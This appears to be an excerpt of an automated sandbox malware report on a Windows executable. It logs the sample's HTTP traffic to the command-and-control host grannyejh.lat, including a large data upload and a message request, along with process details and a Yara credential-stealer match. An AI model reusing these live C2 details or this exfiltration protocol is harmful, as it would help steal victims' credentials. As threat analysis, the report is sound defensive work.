                                                                                                                                    2024-12-18 20:23:04 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=MIQJLMFUP3T
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 1187
                                                                                                                                    Host: grannyejh.lat
                                                                                                                                    2024-12-18 20:23:04 UTC1187OUTData Raw: 2d 2d 4d 49 51 4a 4c 4d 46 55 50 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 32 33 39 37 41 32 43 44 44 30 33 31 46 31 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41 0d 0a 2d 2d 4d 49 51 4a 4c 4d 46 55 50 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 49 51 4a 4c 4d 46 55 50 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d 0a 2d 2d 4d 49 51 4a 4c 4d 46 55 50 33 54 0d
                                                                                                                                    Data Ascii: --MIQJLMFUP3TContent-Disposition: form-data; name="hwid"782397A2CDD031F1C683EA0F4CB0333A--MIQJLMFUP3TContent-Disposition: form-data; name="pid"1--MIQJLMFUP3TContent-Disposition: form-data; name="lid"yau6Na--7911731954--MIQJLMFUP3T
                                                                                                                                    2024-12-18 20:23:08 UTC1032INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 18 Dec 2024 20:23:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=4594nabsk4imbnpiu5sc1trjm2; expires=Sun, 13-Apr-2025 14:09:46 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pCgKaEQy1ij24uMaUL8kLyFZ6XeaV9C88jCsEqJUjmv22ynLXyju3LU9mz%2BWvZzjK0rDam%2Fry1RIZF9DBcZNdUFvtTDyXiskxlBLdA7a2JF4ln%2FJ5kz8DCZehs3hNDag"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f41de624d3343b3-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=38529&min_rtt=38529&rtt_var=19264&sent=8&recv=8&lost=0&retrans=2&sent_bytes=5658&recv_bytes=2094&delivery_rate=10071&cwnd=197&unsent_bytes=0&cid=83d6d414e73a3438&ts=4493&x=0"
                                                                                                                                    2024-12-18 20:23:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2024-12-18 20:23:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.649811172.67.179.1094434156C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-18 20:23:10 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=PZV8R242U8OZ
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 548547
                                                                                                                                    Host: grannyejh.lat
                                                                                                                                    2024-12-18 20:23:10 UTC15331OUTData Raw: 2d 2d 50 5a 56 38 52 32 34 32 55 38 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 32 33 39 37 41 32 43 44 44 30 33 31 46 31 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41 0d 0a 2d 2d 50 5a 56 38 52 32 34 32 55 38 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 5a 56 38 52 32 34 32 55 38 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d 0a 2d 2d 50 5a 56 38 52 32 34 32 55
                                                                                                                                    Data Ascii: --PZV8R242U8OZContent-Disposition: form-data; name="hwid"782397A2CDD031F1C683EA0F4CB0333A--PZV8R242U8OZContent-Disposition: form-data; name="pid"1--PZV8R242U8OZContent-Disposition: form-data; name="lid"yau6Na--7911731954--PZV8R242U
                                                                                                                                    2024-12-18 20:23:10 UTC15331OUTData Raw: 12 42 9c fd a0 65 a2 e8 aa 98 b8 21 34 c3 df 7c 78 2a 1f 35 f0 64 92 a6 36 b5 a0 22 f5 4c 94 48 b5 1d 6b 48 66 8a 7e 0f d9 7f 46 12 03 61 12 87 4b bf 0c 7d 6a 29 54 fd d5 de e4 8c df 04 ab ed 5b f9 aa 0c 48 e2 e4 a3 4c f3 68 2d 89 82 fb a3 3d a1 c6 0e 3d 75 e3 ae 9b bd 7c a0 97 ef 9e 9f e9 31 3a 4e 4b a4 40 c8 2c 5c 22 5e 67 f2 57 69 77 74 48 34 0d 13 e0 3f e5 9a c0 68 ab 58 ee 93 2a d2 83 a4 47 be b5 94 44 5a e8 09 7d 13 cf 3b 79 b4 de cc 02 e6 dd 22 a5 a9 bc c8 67 1a ea d7 da c8 87 75 6d bb c7 93 f1 f8 75 23 89 a8 e8 f2 ce 47 ee 13 5b c2 0c 68 f9 67 f9 c3 3b ea 4f ad e1 dc 42 b2 c5 2d b7 1f 24 3e 11 de a5 05 c7 fd b6 52 a3 b5 0a 12 ca a8 d6 9e 9b a9 e6 7b a8 89 c4 a4 25 0e 1e fa f9 5d 85 74 b6 c5 12 97 9d 80 46 73 46 14 90 8e 4c 13 df 75 88 f9 c9 43 cd
                                                                                                                                    Data Ascii: Be!4|x*5d6"LHkHf~FaK}j)T[HLh-==u|1:NK@,\"^gWiwtH4?hX*GDZ};y"gumu#G[hg;OB-$>R{%]tFsFLuC
                                                                                                                                    2024-12-18 20:23:10 UTC15331OUTData Raw: 62 37 03 bb 88 2c d5 15 96 8c 92 63 81 89 0e 76 ea 92 f2 81 67 ef 8a 45 f3 3c 22 be d3 0f af 7e b2 18 76 ac b4 d4 e3 26 4d a7 6d 36 3f 64 09 a0 64 26 32 23 8d 8e 26 fe c4 36 ca 14 2a a5 89 0a ac 8a 83 7d 98 82 90 35 6c 39 1a 9e ea da 6c 79 30 3d 68 94 a2 76 2b d7 e9 76 18 15 cb 7c ac f5 49 9e 36 74 e0 ed d2 7a e0 bb 5a fa f2 a3 7a 89 4b c0 18 65 32 8d bd 57 85 f6 b3 b5 ed 8b 54 95 eb 07 20 59 2f 64 44 1e 42 9d 77 37 9a 79 65 bc 4c fb b2 76 9f 6b bd fd fc 86 d7 5f 60 c1 6c c2 f0 a7 33 d7 98 7b 20 0a 96 3d b6 26 a4 68 e8 ed cd fb 3f ff d8 08 62 28 35 fc 6f ba 43 12 e2 eb 2d 14 fd 57 1d 4e 6c 84 1b 5b e1 48 4e 70 34 6d b5 0f 45 66 2e 9d c1 65 35 85 a9 b6 c4 0f 76 6b d1 b7 7a a4 0a 7c 5d f9 81 38 aa 8b 67 a6 fc e6 ca 05 6d c5 91 cc 63 26 d9 e9 bb ed ff 70 cd
                                                                                                                                    Data Ascii: b7,cvgE<"~v&Mm6?dd&2#&6*}5l9ly0=hv+v|I6tzZzKe2WT Y/dDBw7yeLvk_`l3{ =&h?b(5oC-WNl[HNp4mEf.e5vkz|]8gmc&p
                                                                                                                                    2024-12-18 20:23:10 UTC15331OUTData Raw: a1 fa 7a ab dc 90 58 08 89 49 de 30 48 04 09 c2 4e a5 9b 0c c4 f0 14 51 1c 06 28 04 a2 9e 91 aa b7 2a 0a 06 a5 7f bd c4 cb 20 eb a5 b9 ec 35 6a d9 50 6b 9f ec 41 5f 63 1e 48 31 b9 56 18 6b dd d0 98 5b 82 1c d2 f1 62 5e 7d a6 6c ed 82 bd c1 b5 ae 5f 1c 0d 2f 10 7a bd fd fd 71 d2 65 6f e6 14 3f c9 a8 36 40 5c fc a2 4d fa 93 70 fc 2e 91 95 f9 be 8b db 43 9b f3 e3 4c fe 8d 24 0d 9d 69 a9 ef 0a d6 e3 e4 69 20 29 0e 30 35 66 59 64 f5 e7 b4 99 5f 7a 68 b5 01 2a 39 c9 9b 23 f6 05 56 dd d1 34 82 39 7a 8d e3 7b 00 69 2d 07 17 dc 23 eb 6d aa d8 16 ed 54 12 27 74 cf 22 9e 2a 0c 28 c4 4d a0 f8 27 7b 7a fb 5a 59 df cd d5 81 42 07 c4 c3 8b fd 44 1d 86 d2 8f 86 86 6d cc 46 c4 02 70 d3 f6 5c ee 9d bc d7 dd 21 c6 24 a2 18 c4 28 75 a3 aa 2d 10 e6 9e 0b 19 e0 03 fb db 72 ef
                                                                                                                                    Data Ascii: zXI0HNQ(* 5jPkA_cH1Vk[b^}l_/zqeo?6@\Mp.CL$ii )05fYd_zh*9#V49z{i-#mT't"*(M'{zZYBDmFp\!$(u-r
                                                                                                                                    2024-12-18 20:23:10 UTC15331OUTData Raw: eb 51 b0 91 c3 38 6e d8 9d f6 cd 3f 3b 6c d2 93 f1 8f 04 62 f5 4c 27 37 1e 29 a6 e3 54 69 d7 b7 cd dd 63 ac 67 c8 e0 dd 02 4b e8 46 c7 07 fa 69 6b 93 cf 81 13 fa a1 03 37 9c 9b 11 ba 83 a1 0d fc 06 d7 28 db a3 6e 1f dc 3d f5 5d 52 cd 05 29 82 17 11 dc b7 54 b8 93 d0 bd 5d f6 1a f2 41 98 9a 16 b2 e5 68 e8 27 ab f4 48 5f 04 51 0f d3 85 c8 89 50 d0 33 b3 e6 33 c6 af a1 c7 94 56 9d 97 24 26 83 8d 18 e3 ca a6 8b 9e a7 06 22 cb 80 62 39 12 b6 59 5b fd 0d 4d 5d 6f 7d 0a f0 c2 64 03 9b 38 6a 7d de 05 30 d6 71 12 99 5f 02 02 30 69 c0 10 18 21 8c 7d d7 84 05 3f a8 87 13 ac 2d 48 d8 69 f7 bd d8 14 58 1c ac db ce 7e 55 36 5d 4a 2c 84 0e ed 8f f1 66 1d cd 79 f1 54 c3 a1 87 df be 75 38 9b 11 ef 75 d9 b0 79 10 ef 0b dd 62 2b 8c b2 bb d2 3c 47 59 5f 46 96 de ba 09 8d b6
                                                                                                                                    Data Ascii: Q8n?;lbL'7)TicgKFik7(n=]R)T]Ah'H_QP33V$&"b9Y[M]o}d8j}0q_0i!}?-HiX~U6]J,fyTu8uyb+<GY_F
                                                                                                                                    2024-12-18 20:23:10 UTC15331OUTData Raw: 9f 96 6c 88 e0 45 5d 92 ae 14 79 b1 bc b8 9a 37 2a 2d de 37 d4 14 ae 0b 59 d4 8e f2 a6 54 ec dd 76 1d 36 39 88 41 f2 bf b3 48 10 34 69 12 3c eb ea aa f4 65 45 ae 0c 03 89 40 60 fc e0 d9 d1 74 93 a3 47 1f 04 59 cc ed fd 7e 2b f7 b0 ef de c1 89 aa 71 fa 5c 50 ee 36 93 f5 59 2c b9 f5 59 48 fb 05 d7 4b f7 ca 6d 5c d2 1f 44 28 fa 6c bb 58 6a 3e aa 60 41 6a f5 c8 b2 24 01 a2 1e 07 8b e7 e5 31 24 19 f8 1f 71 96 77 e4 41 2c eb 96 b2 0e 34 d6 bf 8c 53 8f 6c 26 99 3c a6 73 6a cb 49 e6 55 42 27 43 a3 85 09 bf ae 33 c2 97 3e 29 54 f5 14 58 dd 1d 90 9f c4 cf 78 c5 05 f8 62 0e f2 6e ce 7d 66 04 4f ec cd 66 cd 36 8c a9 13 5e d4 df d7 b5 49 18 2d ce 0a b3 24 d1 0c 52 66 5d 46 b1 bf ce 8d b9 ac 3e eb 82 c5 b1 dd 51 05 c1 85 a9 90 51 9d 9f f0 8f 9d 59 19 8b f1 05 97 72 1b
                                                                                                                                    Data Ascii: lE]y7*-7YTv69AH4i<eE@`tGY~+q\P6Y,YHKm\D(lXj>`Aj$1$qwA,4Sl&<sjIUB'C3>)TXxbn}fOf6^I-$Rf]F>QQYr
                                                                                                                                    2024-12-18 20:23:10 UTC15331OUTData Raw: 8d d4 04 a2 06 a1 cd 1b 98 92 2a cb a3 7c e0 d0 d2 31 49 06 9e 0d d3 92 f3 2c ee 09 cf 23 53 91 2d 6a 39 b5 4a 44 a5 ac 74 c1 b1 97 c6 ab b6 c4 1c 8a 03 a4 dc ef 18 17 17 6e 96 cd b6 1f 51 a0 09 72 65 c4 4e 3f cc 64 8a d5 f5 27 23 19 6a 22 88 15 41 40 d5 52 91 b5 07 f3 b6 37 61 2f 49 b0 b2 5e a1 4a 30 10 9f cf 47 c1 00 0e 89 59 36 da 1f f0 9a b9 fb 07 6b 14 89 a9 2e 34 a0 5e 2d 1c 95 50 8f 8a 82 c3 39 42 a2 68 9c 61 88 ff d0 0b 26 63 fd 13 f2 92 c5 ad 1a c6 c6 04 ae e9 b6 55 8b 6a 58 d5 c6 e2 27 ed fb b4 97 b3 fd a7 73 af cf 5f 69 42 32 de 9a fe 77 91 91 ef 5b 97 ec 81 80 91 49 e6 f1 e1 63 15 ef 81 0f 2a a5 88 7b 7b 14 20 36 8f 49 81 d0 55 6f 86 fb b4 73 47 60 da 5d b2 d0 5a e0 5b 1c b8 59 46 df 2b c4 67 eb ef b4 52 62 54 e4 34 76 fb 4a 30 db 5f 53 b8 e7
                                                                                                                                    Data Ascii: *|1I,#S-j9JDtnQreN?d'#j"A@R7a/I^J0GY6k.4^-P9Bha&cUjX's_iB2w[Ic*{{ 6IUosG`]Z[YF+gRbT4vJ0_S
                                                                                                                                    2024-12-18 20:23:10 UTC15331OUTData Raw: c6 d0 4a eb 5d 49 41 12 3f c2 1b 3a f3 b4 16 88 7c b6 6b 2a 24 54 6c 52 c7 44 df b1 b0 64 4a 47 23 09 63 ed 97 52 2c 6a 24 6a 5e 05 24 5d 21 c5 84 19 62 35 db 4a c8 b3 c3 8b fc 0f fb 67 83 b2 af bf ad da 07 f2 ab c0 45 eb 87 13 1b f2 a1 f9 21 da e5 3f 1c b9 7d 09 dc 7f bf 5e 59 4e 3d d1 3b be d3 3e da 6b 62 fe 6b 4d a8 80 8e 68 f9 85 2c 0d b7 df ca ff ca fd ca 0f f8 56 79 1a 84 2b ad de 5f 79 34 e7 d9 df 7a 65 33 42 f9 da 0b b7 86 d2 05 81 8e 7d 57 a0 7a dd d8 f0 01 f3 61 cf 91 57 13 11 b9 78 4a e0 8d cc 61 46 d4 d3 27 ed 7a ed 84 fd ab eb 42 00 eb 66 50 d9 a7 2d 62 b6 d5 75 40 7b 39 7b df b9 1e 98 b1 cc 39 7e 42 66 5c c5 51 4d 64 eb be 69 6d cd 3b 95 c1 fd 2e 9c e3 ba c0 e9 31 e7 b4 83 07 34 58 82 80 2b e8 f0 fa 1d eb 30 af d7 4c 57 e9 73 1d 53 4f 6b 54
                                                                                                                                    Data Ascii: J]IA?:|k*$TlRDdJG#cR,j$j^$]!b5JgE!?}^YN=;>kbkMh,Vy+_y4ze3B}WzaWxJaF'zBfP-bu@{9{9~Bf\QMdim;.14X+0LWsSOkT
                                                                                                                                    2024-12-18 20:23:10 UTC15331OUTData Raw: 1a 73 cf 7e 27 fb 21 31 e4 68 89 55 be b4 80 d3 dd 86 f5 e6 2e dd 8d 43 c7 c0 61 77 b8 3f a0 9c 63 2c 3e 50 44 82 e7 42 fc e9 0b 57 ff f8 ce fe a5 5a 16 38 07 2d 14 fe db 21 15 d9 59 42 8e 09 91 42 2d f4 19 b1 1e f6 67 eb 3a 0c 7a 08 83 c9 c3 e6 15 36 06 64 df 9b 99 25 82 01 18 a2 4a 46 09 d8 b2 e0 9c 9d 51 ce c9 dd 92 0c eb 04 48 1d aa eb 60 22 7d e5 78 a6 d3 95 ae 77 1e b6 d8 a3 53 bc 55 94 13 ef ac 74 53 51 37 09 44 32 46 4c 08 28 0f 57 4a 0c 33 26 c5 ef b8 0d e3 00 0e b6 b1 cd ce dc 5d ba f8 83 0a f3 89 8a 1c 7e 37 22 22 3a ac d3 67 0c 7b a6 eb 87 68 f9 da 49 70 e3 57 05 4d 9a f1 e7 3e 03 84 5f bc 4e fc 81 52 f3 d4 6c 92 bd 5a 45 e9 4d 5d c2 58 20 a2 db 30 9f 09 de fb 55 17 fe 4d 48 90 7e 83 74 f0 74 67 73 d9 98 41 57 ba bb a6 a0 2f 3d 53 4b e2 8f 70
                                                                                                                                    Data Ascii: s~'!1hU.Caw?c,>PDBWZ8-!YBB-g:z6d%JFQH`"}xwSUtSQ7D2FL(WJ3&]~7"":g{hIpWM>_NRlZEM]X 0UMH~ttgsAW/=SKp
                                                                                                                                    2024-12-18 20:23:10 UTC15331OUTData Raw: d4 e8 31 2b cb b6 59 91 ec bf fd 67 d8 71 3b e5 bc 6f fd ba 36 21 3b f0 db 60 6b db a3 34 00 7d cb 53 6b b6 6a 70 a0 78 e1 cf 7c 59 60 9e ef d0 c0 a8 a6 df e8 2d f5 e2 85 d8 90 8e 60 8f a4 ef b7 3a 6b 2c f7 dc a4 76 2d dc f1 9a d7 0a 99 bb c3 29 fe 45 b0 48 97 05 83 63 10 ed 87 c1 40 f7 2f 59 60 58 6e 9d 8c 2e 1e 6d b5 16 d0 03 da 52 56 2a 07 7b d4 b0 05 c2 8a 7f cc 3d 6e 78 52 82 be 2b cc 6f 5b 7f ba a3 be b5 32 4e 72 3f db ed 22 15 79 b1 27 4e 15 68 4b 87 58 73 84 39 11 68 b7 e1 fe df 79 c7 52 48 92 31 29 8c 64 f0 85 c7 26 7e 3f d0 3e 02 3c 47 52 22 1f 71 82 78 3e 44 0a 82 ca 4d 20 28 0b 1f 97 a1 40 1b 9b 94 74 bb 0c 6d 44 8e 2c f3 fc 5e 8f e3 dd 8a 6f 3c db 16 b8 70 aa b5 02 18 02 c6 95 76 85 d2 1a 5e f9 18 1d 32 f6 3e 65 9b 9d 3b e8 75 f3 a5 55 c4 d5
                                                                                                                                    Data Ascii: 1+Ygq;o6!;`k4}Skjpx|Y`-`:k,v-)EHc@/Y`Xn.mRV*{=nxR+o[2Nr?"y'NhKXs9hyRH1)d&~?><GR"qx>DM (@tmD,^o<pv^2>e;uU
                                                                                                                                    2024-12-18 20:23:18 UTC1038INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 18 Dec 2024 20:23:18 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=2h9r8jj9gcm8lt5rnn06ctsf2b; expires=Sun, 13-Apr-2025 14:09:52 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CgTq1mhMu2oug35%2FDWxwPloHAqqBj7gvqUPxM%2FNfnDXPCDJoYWnhHbGnpkZ50Y%2BGbZh71hx6RjnUtI0cwAXinbNRHRWGEOXxeWB9Os3PWVMlGAhUkaKSlaow420s3VeZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f41de869cc441d5-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=40755&min_rtt=37089&rtt_var=21241&sent=315&recv=588&lost=0&retrans=0&sent_bytes=2831&recv_bytes=551019&delivery_rate=43962&cwnd=226&unsent_bytes=0&cid=c72a31aeba1698d2&ts=7865&x=0"


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.649836172.67.179.1094434156C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-18 20:23:19 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 87
                                                                                                                                    Host: grannyejh.lat
                                                                                                                                    2024-12-18 20:23:19 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 26 6a 3d 26 68 77 69 64 3d 37 38 32 33 39 37 41 32 43 44 44 30 33 31 46 31 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41
                                                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=yau6Na--7911731954&j=&hwid=782397A2CDD031F1C683EA0F4CB0333A
                                                                                                                                    2024-12-18 20:23:39 UTC1028INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 18 Dec 2024 20:23:38 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=molvjquageosdik6eg5a6cmr2l; expires=Sun, 13-Apr-2025 14:10:00 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8EiNRp61PvllnC709n6gLfOxLhaub1XdVC4KJPWtJUmIZ5Vojk8gzwLyjUUk1679YTCM6IYop6nTFnb4P9OdUuSy9eFxXURniNu5M%2BuPeLq4w%2BDeQIJr5obWehdrM0pi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8f41debfaa69de98-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1697&rtt_var=665&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=984&delivery_rate=1720683&cwnd=212&unsent_bytes=0&cid=d2bdd3973afdedd1&ts=19127&x=0"
                                                                                                                                    2024-12-18 20:23:39 UTC54INData Raw: 33 30 0d 0a 72 73 4a 44 42 4f 70 74 58 6f 46 47 73 38 2f 45 77 4c 38 68 44 76 4e 4f 5a 6f 50 47 64 63 6a 7a 42 66 49 6a 42 79 58 6d 59 49 2f 31 6e 77 3d 3d 0d 0a
                                                                                                                                    Data Ascii: 30rsJDBOptXoFGs8/EwL8hDvNOZoPGdcjzBfIjByXmYI/1nw==
                                                                                                                                    2024-12-18 20:23:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Click to jump to process

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Click to jump to process

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:15:22:18
                                                                                                                                    Start date:18/12/2024
                                                                                                                                    Path:C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\NHEXQatKdE.exe"
                                                                                                                                    Imagebase:0x6e0000
                                                                                                                                    File size:723'584 bytes
                                                                                                                                    MD5 hash:1AF7854A5AD5A97C01E2217CDF0F7656
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:15:22:18
                                                                                                                                    Start date:18/12/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:15:22:23
                                                                                                                                    Start date:18/12/2024
                                                                                                                                    Path:C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\user\Desktop\NHEXQatKdE.exe"
                                                                                                                                    Imagebase:0x6e0000
                                                                                                                                    File size:723'584 bytes
                                                                                                                                    MD5 hash:1AF7854A5AD5A97C01E2217CDF0F7656
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:15:22:23
                                                                                                                                    Start date:18/12/2024
                                                                                                                                    Path:C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\NHEXQatKdE.exe"
                                                                                                                                    Imagebase:0x6e0000
                                                                                                                                    File size:723'584 bytes
                                                                                                                                    MD5 hash:1AF7854A5AD5A97C01E2217CDF0F7656
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2560508442.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:6.1%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:7.8%
                                                                                                                                      Total number of Nodes:1706
                                                                                                                                      Total number of Limit Nodes:20
